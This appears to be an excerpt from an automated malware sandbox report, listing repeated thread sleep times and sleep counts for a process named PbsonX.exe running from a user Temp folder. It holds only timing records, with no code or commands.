Source: C:\Users\user\AppData\Local\Temp\PbsonX.exe TID: 932 Thread sleep time: -599217s >= -30000s Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\PbsonX.exe TID: 932 Thread sleep time: -599108s >= -30000s Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\PbsonX.exe TID: 932 Thread sleep time: -598999s >= -30000s Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\PbsonX.exe TID: 932 Thread sleep time: -598890s >= -30000s Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\PbsonX.exe TID: 932 Thread sleep time: -598781s >= -30000s Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\PbsonX.exe TID: 932 Thread sleep time: -598671s >= -30000s Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\PbsonX.exe TID: 932 Thread sleep time: -598562s >= -30000s Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\PbsonX.exe TID: 932 Thread sleep time: -598453s >= -30000s Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\PbsonX.exe TID: 932 Thread sleep time: -598343s >= -30000s Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\PbsonX.exe TID: 932 Thread sleep time: -598230s >= -30000s Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\PbsonX.exe TID: 932 Thread sleep time: -598113s >= -30000s Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\PbsonX.exe TID: 932 Thread sleep time: -597992s >= -30000s Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\PbsonX.exe TID: 932 Thread sleep time: -597872s >= -30000s Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\PbsonX.exe TID: 932 Thread sleep time: -597656s >= -30000s Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\PbsonX.exe TID: 932 Thread sleep time: -597546s >= -30000s Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\PbsonX.exe TID: 932 Thread sleep time: -597436s >= -30000s Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\PbsonX.exe TID: 932 Thread sleep time: -597327s >= -30000s Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\PbsonX.exe TID: 932 Thread sleep time: -597218s >= -30000s Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\PbsonX.exe TID: 932 Thread sleep time: -597108s >= -30000s Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\PbsonX.exe TID: 932 Thread sleep time: -596999s >= -30000s Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\PbsonX.exe TID: 932 Thread sleep time: -596890s >= -30000s Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\PbsonX.exe TID: 932 Thread sleep time: -596781s >= -30000s Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\PbsonX.exe TID: 932 Thread sleep time: -596671s >= -30000s Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\PbsonX.exe TID: 932 Thread sleep time: -596562s >= -30000s Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\PbsonX.exe TID: 932 Thread sleep time: -596453s >= -30000s Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\PbsonX.exe TID: 932 Thread sleep time: -596343s >= -30000s Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\PbsonX.exe TID: 932 Thread sleep time: -596232s >= -30000s Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\PbsonX.exe TID: 932 Thread sleep time: -596124s >= -30000s Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\PbsonX.exe TID: 932 Thread sleep time: -596015s >= -30000s Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\PbsonX.exe TID: 932 Thread sleep time: -595906s >= -30000s Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\PbsonX.exe TID: 932 Thread sleep time: -595796s >= -30000s Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\PbsonX.exe TID: 932 Thread sleep time: -595684s >= -30000s Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\PbsonX.exe TID: 932 Thread sleep time: -595578s >= -30000s Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\PbsonX.exe TID: 932 Thread sleep time: -595468s >= -30000s Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\PbsonX.exe TID: 932 Thread sleep time: -595244s >= -30000s Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\PbsonX.exe TID: 932 Thread sleep time: -594923s >= -30000s Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\PbsonX.exe TID: 932 Thread sleep time: -594750s >= -30000s Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\PbsonX.exe TID: 932 Thread sleep time: -594623s >= -30000s Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\PbsonX.exe TID: 932 Thread sleep time: -594513s >= -30000s Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\PbsonX.exe TID: 932 Thread sleep time: -594402s >= -30000s Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\PbsonX.exe TID: 932 Thread sleep time: -594250s >= -30000s Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\PbsonX.exe TID: 932 Thread sleep time: -594117s >= -30000s Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\PbsonX.exe TID: 932 Thread sleep time: -593875s >= -30000s Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\PbsonX.exe TID: 932 Thread sleep time: -593703s >= -30000s Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\PbsonX.exe TID: 932 Thread sleep time: -593484s >= -30000s Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\PbsonX.exe TID: 932 Thread sleep time: -593366s >= -30000s Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\PbsonX.exe TID: 932 Thread sleep time: -593248s >= -30000s Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\PbsonX.exe TID: 932 Thread sleep time: -593140s >= -30000s Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\PbsonX.exe TID: 932 Thread sleep time: -593008s >= -30000s Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\PbsonX.exe TID: 932 Thread sleep time: -592890s >= -30000s Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\PbsonX.exe TID: 4476 Thread sleep count: 38 > 30
Source: C:\Users\user\AppData\Local\Temp\PbsonX.exe TID: 4476 Thread sleep time: -35048813740048126s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\PbsonX.exe TID: 4476 Thread sleep time: -600000s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\PbsonX.exe TID: 4476 Thread sleep time: -599891s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\PbsonX.exe TID: 1772 Thread sleep count: 8527 > 30
Source: C:\Users\user\AppData\Local\Temp\PbsonX.exe TID: 1772 Thread sleep count: 1274 > 30
Source: C:\Users\user\AppData\Local\Temp\PbsonX.exe TID: 4476 Thread sleep time: -599766s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\PbsonX.exe TID: 4476 Thread sleep time: -599639s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\PbsonX.exe TID: 4476 Thread sleep time: -599531s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\PbsonX.exe TID: 4476 Thread sleep time: -599420s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\PbsonX.exe TID: 4476 Thread sleep time: -599312s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\PbsonX.exe TID: 4476 Thread sleep time: -599203s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\PbsonX.exe TID: 4476 Thread sleep time: -599094s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\PbsonX.exe TID: 4476 Thread sleep time: -598969s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\PbsonX.exe TID: 4476 Thread sleep time: -598859s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\PbsonX.exe TID: 4476 Thread sleep time: -598750s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\PbsonX.exe TID: 4476 Thread sleep time: -598640s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\PbsonX.exe TID: 4476 Thread sleep time: -598531s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\PbsonX.exe TID: 4476 Thread sleep time: -598417s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\PbsonX.exe TID: 4476 Thread sleep time: -598312s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\PbsonX.exe TID: 4476 Thread sleep time: -598134s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\PbsonX.exe TID: 4476 Thread sleep time: -598025s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\PbsonX.exe TID: 4476 Thread sleep time: -597797s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\PbsonX.exe TID: 4476 Thread sleep time: -597687s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\PbsonX.exe TID: 4476 Thread sleep time: -597577s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\PbsonX.exe TID: 4476 Thread sleep time: -597469s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\PbsonX.exe TID: 4476 Thread sleep time: -597359s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\PbsonX.exe TID: 4476 Thread sleep time: -597250s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\PbsonX.exe TID: 4476 Thread sleep time: -597140s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\PbsonX.exe TID: 4476 Thread sleep time: -597031s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\PbsonX.exe TID: 4476 Thread sleep time: -596922s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\PbsonX.exe TID: 4476 Thread sleep time: -596813s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\PbsonX.exe TID: 4476 Thread sleep time: -596703s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\PbsonX.exe TID: 4476 Thread sleep time: -596594s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\PbsonX.exe TID: 4476 Thread sleep time: -596484s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\PbsonX.exe TID: 4476 Thread sleep time: -596374s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\PbsonX.exe TID: 4476 Thread sleep time: -596265s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\PbsonX.exe TID: 4476 Thread sleep time: -596156s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\PbsonX.exe TID: 4476 Thread sleep time: -596047s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\PbsonX.exe TID: 4476 Thread sleep time: -595938s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\PbsonX.exe TID: 4476 Thread sleep time: -595813s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\PbsonX.exe TID: 4476 Thread sleep time: -595688s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\PbsonX.exe TID: 4476 Thread sleep time: -595563s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\PbsonX.exe TID: 4476 Thread sleep time: -595384s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\PbsonX.exe TID: 4476 Thread sleep time: -595065s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\PbsonX.exe TID: 4476 Thread sleep time: -594891s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\PbsonX.exe TID: 4476 Thread sleep time: -594765s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\PbsonX.exe TID: 4476 Thread sleep time: -594654s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\PbsonX.exe TID: 4476 Thread sleep time: -594544s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\PbsonX.exe TID: 4476 Thread sleep time: -594390s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\PbsonX.exe TID: 4476 Thread sleep time: -594258s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\PbsonX.exe TID: 4476 Thread sleep time: -594016s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\PbsonX.exe TID: 4476 Thread sleep time: -593844s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\PbsonX.exe TID: 4476 Thread sleep time: -593625s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\PbsonX.exe TID: 4476 Thread sleep time: -593507s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\PbsonX.exe TID: 4476 Thread sleep time: -593390s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\PbsonX.exe TID: 4476 Thread sleep time: -593281s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\PbsonX.exe TID: 4476 Thread sleep time: -593149s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\PbsonX.exe TID: 4476 Thread sleep time: -593047s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\PbsonX.exe TID: 4476 Thread sleep time: -592937s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\PbsonX.exe TID: 4476 Thread sleep time: -592819s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\PbsonX.exe TID: 7016 Thread sleep count: 37 > 30
Source: C:\Users\user\AppData\Local\Temp\PbsonX.exe TID: 7016 Thread sleep time: -34126476536362649s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\PbsonX.exe TID: 7016 Thread sleep time: -600000s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\PbsonX.exe TID: 7016 Thread sleep time: -599875s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\PbsonX.exe TID: 1196 Thread sleep count: 6938 > 30
Source: C:\Users\user\AppData\Local\Temp\PbsonX.exe TID: 7016 Thread sleep time: -599766s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\PbsonX.exe TID: 7016 Thread sleep time: -599657s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\PbsonX.exe TID: 1196 Thread sleep count: 2827 > 30
Source: C:\Users\user\AppData\Local\Temp\PbsonX.exe TID: 7016 Thread sleep time: -599532s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\PbsonX.exe TID: 7016 Thread sleep time: -599405s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\PbsonX.exe TID: 7016 Thread sleep time: -599297s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\PbsonX.exe TID: 7016 Thread sleep time: -599172s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\PbsonX.exe TID: 7016 Thread sleep time: -599063s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\PbsonX.exe TID: 7016 Thread sleep time: -598938s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\PbsonX.exe TID: 7016 Thread sleep time: -598827s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\PbsonX.exe TID: 7016 Thread sleep time: -598719s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\PbsonX.exe TID: 7016 Thread sleep time: -598579s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\PbsonX.exe TID: 7016 Thread sleep time: -598454s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\PbsonX.exe TID: 7016 Thread sleep time: -598342s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\PbsonX.exe TID: 7016 Thread sleep time: -598233s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\PbsonX.exe TID: 7016 Thread sleep time: -598072s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\PbsonX.exe TID: 7016 Thread sleep time: -597963s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\PbsonX.exe TID: 7016 Thread sleep time: -597735s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\PbsonX.exe TID: 7016 Thread sleep time: -597625s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\PbsonX.exe TID: 7016 Thread sleep time: -597515s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\PbsonX.exe TID: 7016 Thread sleep time: -597406s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\PbsonX.exe TID: 7016 Thread sleep time: -597297s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\PbsonX.exe TID: 7016 Thread sleep time: -597188s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\PbsonX.exe TID: 7016 Thread sleep time: -597063s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\PbsonX.exe TID: 7016 Thread sleep time: -596938s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\PbsonX.exe TID: 7016 Thread sleep time: -596813s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\PbsonX.exe TID: 7016 Thread sleep time: -596688s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\PbsonX.exe TID: 7016 Thread sleep time: -596579s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\PbsonX.exe TID: 7016 Thread sleep time: -596454s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\PbsonX.exe TID: 7016 Thread sleep time: -596329s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\PbsonX.exe TID: 7016 Thread sleep time: -596204s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\PbsonX.exe TID: 7016 Thread sleep time: -596079s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\PbsonX.exe TID: 7016 Thread sleep time: -595954s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\PbsonX.exe TID: 7016 Thread sleep time: -595829s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\PbsonX.exe TID: 7016 Thread sleep time: -595704s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\PbsonX.exe TID: 7016 Thread sleep time: -595579s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\PbsonX.exe TID: 7016 Thread sleep time: -595438s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\PbsonX.exe TID: 7016 Thread sleep time: -594985s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\PbsonX.exe TID: 7016 Thread sleep time: -594829s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\PbsonX.exe TID: 7016 Thread sleep time: -594688s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\PbsonX.exe TID: 7016 Thread sleep time: -594563s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\PbsonX.exe TID: 7016 Thread sleep time: -594439s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\PbsonX.exe TID: 7016 Thread sleep time: -594313s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\PbsonX.exe TID: 7016 Thread sleep time: -594196s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\PbsonX.exe TID: 7016 Thread sleep time: -593954s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\PbsonX.exe TID: 7016 Thread sleep time: -593782s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\PbsonX.exe TID: 7016 Thread sleep time: -593563s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\PbsonX.exe TID: 7016 Thread sleep time: -593445s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\PbsonX.exe TID: 7016 Thread sleep time: -593328s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\PbsonX.exe TID: 7016 Thread sleep time: -593219s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\PbsonX.exe TID: 7016 Thread sleep time: -593087s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\PbsonX.exe TID: 7016 Thread sleep time: -592969s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\PbsonX.exe TID: 7016 Thread sleep time: -592859s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\PbsonX.exe TID: 7016 Thread sleep time: -592747s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\PbsonX.exe TID: 7016 Thread sleep time: -592233s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\PbsonX.exe TID: 7016 Thread sleep time: -592076s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\PbsonX.exe TID: 7016 Thread sleep time: -591933s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\PbsonX.exe TID: 7016 Thread sleep time: -591828s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\PbsonX.exe TID: 6684 Thread sleep count: 39 > 30
Source: C:\Users\user\AppData\Local\Temp\PbsonX.exe TID: 6684 Thread sleep time: -35971150943733603s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\PbsonX.exe TID: 6684 Thread sleep time: -600000s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\PbsonX.exe TID: 6684 Thread sleep time: -599891s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\PbsonX.exe TID: 3748 Thread sleep count: 6422 > 30
Source: C:\Users\user\AppData\Local\Temp\PbsonX.exe TID: 6684 Thread sleep time: -599781s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\PbsonX.exe TID: 3748 Thread sleep count: 3357 > 30
Source: C:\Users\user\AppData\Local\Temp\PbsonX.exe TID: 6684 Thread sleep time: -599672s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\PbsonX.exe TID: 6684 Thread sleep time: -599563s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\PbsonX.exe TID: 6684 Thread sleep time: -599438s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\PbsonX.exe TID: 6684 Thread sleep time: -599313s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\PbsonX.exe TID: 6684 Thread sleep time: -599188s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\PbsonX.exe TID: 6684 Thread sleep time: -599078s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\PbsonX.exe TID: 6684 Thread sleep time: -598969s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\PbsonX.exe TID: 6684 Thread sleep time: -598844s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\PbsonX.exe TID: 6684 Thread sleep time: -598735s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\PbsonX.exe TID: 6684 Thread sleep time: -598594s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\PbsonX.exe TID: 6684 Thread sleep time: -598484s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\PbsonX.exe TID: 6684 Thread sleep time: -598373s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\PbsonX.exe TID: 6684 Thread sleep time: -598265s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\PbsonX.exe TID: 6684 Thread sleep time: -598088s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\PbsonX.exe TID: 6684 Thread sleep time: -597978s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\PbsonX.exe TID: 6684 Thread sleep time: -597750s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\PbsonX.exe TID: 6684 Thread sleep time: -597641s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\PbsonX.exe TID: 6684 Thread sleep time: -597516s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\PbsonX.exe TID: 6684 Thread sleep time: -597407s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\PbsonX.exe TID: 6684 Thread sleep time: -597282s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\PbsonX.exe TID: 6684 Thread sleep time: -597157s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\PbsonX.exe TID: 6684 Thread sleep time: -597032s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\PbsonX.exe TID: 6684 Thread sleep time: -596922s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\PbsonX.exe TID: 6684 Thread sleep time: -596797s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\PbsonX.exe TID: 6684 Thread sleep time: -596688s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\PbsonX.exe TID: 6684 Thread sleep time: -596563s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\PbsonX.exe TID: 6684 Thread sleep time: -596453s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\PbsonX.exe TID: 6684 Thread sleep time: -596343s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\PbsonX.exe TID: 6684 Thread sleep time: -596235s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\PbsonX.exe TID: 6684 Thread sleep time: -596125s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\PbsonX.exe TID: 6684 Thread sleep time: -596016s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\PbsonX.exe TID: 6684 Thread sleep time: -595891s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\PbsonX.exe TID: 6684 Thread sleep time: -595779s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\PbsonX.exe TID: 6684 Thread sleep time: -595672s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\PbsonX.exe TID: 6684 Thread sleep time: -595563s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\PbsonX.exe TID: 6684 Thread sleep time: -595338s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\PbsonX.exe TID: 6684 Thread sleep time: -595018s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\PbsonX.exe TID: 6684 Thread sleep time: -594828s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\PbsonX.exe TID: 6684 Thread sleep time: -594719s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\PbsonX.exe TID: 6684 Thread sleep time: -594608s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\PbsonX.exe TID: 6684 Thread sleep time: -594497s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\PbsonX.exe TID: 6684 Thread sleep time: -594345s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\PbsonX.exe TID: 6684 Thread sleep time: -594211s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\PbsonX.exe TID: 6684 Thread sleep time: -593969s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\PbsonX.exe TID: 6684 Thread sleep time: -593798s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\PbsonX.exe TID: 6684 Thread sleep time: -593578s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\PbsonX.exe TID: 6684 Thread sleep time: -593460s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\PbsonX.exe TID: 6684 Thread sleep time: -593344s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\PbsonX.exe TID: 6684 Thread sleep time: -593234s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\PbsonX.exe TID: 6684 Thread sleep time: -593103s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\PbsonX.exe TID: 6684 Thread sleep time: -593000s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\PbsonX.exe TID: 6684 Thread sleep time: -592891s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\PbsonX.exe TID: 6684 Thread sleep time: -592772s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\PbsonX.exe TID: 6684 Thread sleep time: -592249s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\PbsonX.exe TID: 6684 Thread sleep time: -592079s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\PbsonX.exe TID: 2896 Thread sleep count: 35 > 30
Source: C:\Users\user\AppData\Local\Temp\PbsonX.exe TID: 2896 Thread sleep time: -32281802128991695s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\PbsonX.exe TID: 2896 Thread sleep time: -600000s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\PbsonX.exe TID: 2896 Thread sleep time: -599891s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\PbsonX.exe TID: 2688 Thread sleep count: 7054 > 30
Source: C:\Users\user\AppData\Local\Temp\PbsonX.exe TID: 2688 Thread sleep count: 2730 > 30
Source: C:\Users\user\AppData\Local\Temp\PbsonX.exe TID: 2896 Thread sleep time: -599766s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\PbsonX.exe TID: 2896 Thread sleep time: -599640s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\PbsonX.exe TID: 2896 Thread sleep time: -599531s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\PbsonX.exe TID: 2896 Thread sleep time: -599420s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\PbsonX.exe TID: 2896 Thread sleep time: -599312s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\PbsonX.exe TID: 2896 Thread sleep time: -599203s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\PbsonX.exe TID: 2896 Thread sleep time: -599094s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\PbsonX.exe TID: 2896 Thread sleep time: -598969s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\PbsonX.exe TID: 2896 Thread sleep time: -598859s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\PbsonX.exe TID: 2896 Thread sleep time: -598750s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\PbsonX.exe TID: 2896 Thread sleep time: -598641s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\PbsonX.exe TID: 2896 Thread sleep time: -598531s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\PbsonX.exe TID: 2896 Thread sleep time: -598417s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\PbsonX.exe TID: 2896 Thread sleep time: -598295s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\PbsonX.exe TID: 2896 Thread sleep time: -598134s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\PbsonX.exe TID: 2896 Thread sleep time: -598025s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\PbsonX.exe TID: 2896 Thread sleep time: -597797s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\PbsonX.exe TID: 2896 Thread sleep time: -597688s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\PbsonX.exe TID: 2896 Thread sleep time: -597577s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\PbsonX.exe TID: 2896 Thread sleep time: -597469s >= -30000s
